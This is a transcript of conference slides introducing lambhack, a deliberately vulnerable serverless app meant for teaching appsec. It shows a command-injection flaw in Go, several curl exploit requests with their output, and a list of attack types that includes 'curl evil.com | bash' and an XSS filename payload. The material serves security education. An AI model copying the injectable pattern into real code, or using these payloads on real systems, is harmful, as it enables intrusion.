lambhack: a vulnerable serverless application
TRANSCRIPT
CLOUD AUSTIN @WICKETT
LAMBHACK: A VULNERABLE
SERVERLESS APPLICATION
JAMES WICKETT
CLOUD AUSTIN @WICKETT
Development of highly-resilient, distributed systems is now
easier than ever with serverless, however application security is
more important than ever before.
WHY IT MATTERS
CLOUD AUSTIN @WICKETT
‣ HEAD OF RESEARCH AT SIGNAL SCIENCES
‣ DEVOPS DAYS AUSTIN ORGANIZER
‣ AUTHOR DEVOPS FUNDAMENTALS AT LYNDA.COM
‣ BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM
JAMES WICKETT
CLOUD AUSTIN @WICKETT
Serverless encourages functions as deploy units and run as one-time*, read-only containers*, coupled with
third party services that allow running end-to-end applications without
worrying about system operation.
SERVERLESS DEFINITION
* - there is container reuse and writability
CLOUD AUSTIN @WICKETT
VMsHardware Serverless
Inspiration from @adrianco
Waste
Value
CLOUD AUSTIN @WICKETT
CLOUD AUSTIN @WICKETT
http://martinfowler.com/articles/serverless.html
API GATEWAY
CLOUD AUSTIN @WICKETT
CI/CD auth
wordpress scraper
event ingestion chatbots
load testing
MORE SERVERLESS USE CASES
CLOUD AUSTIN @WICKETT
Security
CLOUD AUSTIN @WICKETT
‣ SECURE SOFTWARE SUPPLY CHAIN
‣ DELIVERY PIPELINE
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
FOUR AREAS OF SERVERLESS SECURITY
CLOUD AUSTIN @WICKETT
https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
CLOUD AUSTIN @WICKETThttps://medium.com/
@PaulDJohnston/security-and-serverless-ec52817385c4
CLOUD AUSTIN @WICKETT
INSPIRED BY WEB GOAT AND ALL THE OTHER
GOATS…
CLOUD AUSTIN @WICKETT
CLOUD AUSTIN @WICKETT
‣ SERVERLESS HAS A FALSE SENSE OF SECURITY
‣ API PROXY LAYER THING PROTECTS ME, RIGHT? ;)
‣ WANTED TO SEE MAKE THE POINT THAT APPSEC IS RELEVANT IN SERVERLESS
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ BORN FROM THE HERITAGE OF WEBGOAT, RAILS GOAT, GRUYERE, AND OTHERS…
INTRODUCING LAMBHACK
CLOUD AUSTIN @WICKETT
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ OPEN SOURCE, MIT LICENSED
‣ INCLUDES ARBITRARY CODE EXECUTION IN A QUERY STRING
‣ MORE WORK NEEDED, PULL REQUESTS ACCEPTED AND LOOKING FOR COMMUNITY HELP
‣ GITHUB.COM/WICKETT/LAMBHACK
github.com/wickett/lamback
CLOUD AUSTIN @WICKETT
CLOUD AUSTIN @WICKETT
‣ GOLANG!
‣ AWS LAMBDA SUPPORTS BRING YOUR OWN BINARY
‣ SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM
‣ GO SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES
GO SPARTA
CLOUD AUSTIN @WICKETT
‣ CLOUDWATCH EVENTS AND LOGS
‣ DYNAMODB, KINESIS,
‣ S3
‣ SES, SNS
‣ API GATEWAY CREATION
GO SPARTA INCLUDES
CLOUD AUSTIN @WICKETT
lambhack is a vulnerable serverless lambda application
It would certainly be a bad idea to base any coding patterns off
what you see here.
CLOUD AUSTIN @WICKETT
CLOUD AUSTIN @WICKETT
WHY IS THIS BAD?
command := lambdaEvent.QueryParams[“args"]
output := runner.Run(command)
CLOUD AUSTIN @WICKETT
With command execution available to us in
lambhack, we can poke around the container a bit
CLOUD AUSTIN @WICKETT
UNAME -A
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=uname+-a;+sleep+1"
> Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
CLOUD AUSTIN @WICKETT
CAT /PROC/VERSION$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/version;+sleep+1”
> Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016
CLOUD AUSTIN @WICKETT
LET’S LOOK IN /TMP
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp;+sleep+1"
total 17916 drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 . drwxr-xr-x 21 root root 4096 Feb 8 21:47 .. -rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64
CLOUD AUSTIN @WICKETT
LAMBDA REUSE IN ACTION!
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1”
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/args=ls+/tmp;+sleep+1"
> Sparta.lambda.amd64 wickettfile
CLOUD AUSTIN @WICKETT
WHICH CURL
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=which+curl;+sleep+1"
> /usr/bin/curl
CLOUD AUSTIN @WICKETT
GOT PROXY?$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=curl+https://www.example.com;+sleep+1" > "<!doctype html>\n<html>\n<head>\n <title>Example Domain</title>\n\n <meta charset=\"utf-8\" />\n <meta http-equiv=\"Content-type\" content=\"text/html; charset=utf-8\" />\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\" />\n <style type=\"text/css\">\n body {\n background-color: #f0f0f2;\n margin: 0;\n padding: 0;\n font-family: \"Open Sans\", \"Helvetica Neue\", Helvetica, Arial, sans-serif;\n \n }\n div {\n width: 600px;\n margin: 5em auto;\n padding: 50px;\n background-color: #fff;\n border-radius: 1em;\n }\n a:link, a:visited {\n color: #38488f;\n text-decoration: none;\n }\n @media (max-width: 700px) {\n body {\n background-color: #fff;\n }\n div {\n width: auto;\n margin: 0 auto;\n border-radius: 0;\n padding: 1em;\n }\n }\n </style> \n</head>\n\n<body>\n<div>\n <h1>Example Domain</h1>\n <p>This domain is established to be used for illustrative examples in documents. You may use this\n domain in examples without prior coordination or asking for permission.</p>\n <p><a href=\"http://www.iana.org/domains/example\">More information...</a></p>\n</div>\n</body>\n</html>\n"
bit.ly/lh-demo1
CLOUD AUSTIN @WICKETT
‣ HELP NEEDED
‣ ADD XSS AND OTHER ATTACKS
‣ ADD AUTH VECTORS AND EXAMPLES
‣ NEEDS A UI PLEASE!
‣ PULL REQUESTS ACCEPTED :)
FUTURE OF LAMBHACK
CLOUD AUSTIN @WICKETT
APPLICATION SECURITY IS STILL RELEVANT 15+
YEARS LATER
CLOUD AUSTIN @WICKETT
CLOUD AUSTIN @WICKETT
‣ New surface area, similar appsec problems
‣ Command Exec, XSS, Injection Attacks
‣ All the OWASP Top Ten
‣ What is old is new.
‣ Appending ‘curl evil.com | bash’
‣ Add <script>alert(1)</script> to a filename you upload on s3
TYPES OF ATTACKS
CLOUD AUSTIN @WICKETT
Development of highly-resilient, distributed systems is now
easier than ever with serverless, however application security is
more important than ever before.
WHY IT MATTERS
CLOUD AUSTIN @WICKETT
WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS?
Send an email to [email protected]